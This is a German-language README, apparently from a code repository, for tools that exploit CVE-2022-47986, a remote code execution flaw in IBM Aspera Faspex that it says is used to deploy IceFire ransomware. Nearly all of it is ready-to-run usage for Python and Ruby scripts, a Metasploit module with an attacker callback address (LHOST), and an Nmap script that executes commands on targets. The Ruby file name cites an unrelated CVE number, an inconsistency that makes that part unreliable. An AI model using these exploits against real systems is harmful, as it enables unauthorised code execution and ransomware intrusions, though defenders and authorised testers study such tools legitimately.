
CVE-2022-47986: Python-, Ruby-, NMAP- und Metasploit-Module zur Ausnutzung der Schwachstelle.
Diese Schwachstelle wird aktiv ausgenutzt. IceFire nutzt diese Schwachstelle, um Ransomware auf Zielsystemen zu deployen. Ich möchte SOC/Blue Teams helfen, betroffene Systeme zu identifizieren, und Pentestern/Red Teams, diese auszunutzen und zu melden.
Ich stelle reine Python- und Ruby-Skripte sowie Metasploit- und Nmap-Module zur Verfügung, um die Schwachstelle auszunutzen, die eine RCE (Remote Code Execution) auf IBM Aspera Faspex durch YAML-Deserialisierung verursacht.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
Lizenziert unter der GPL, Version 3.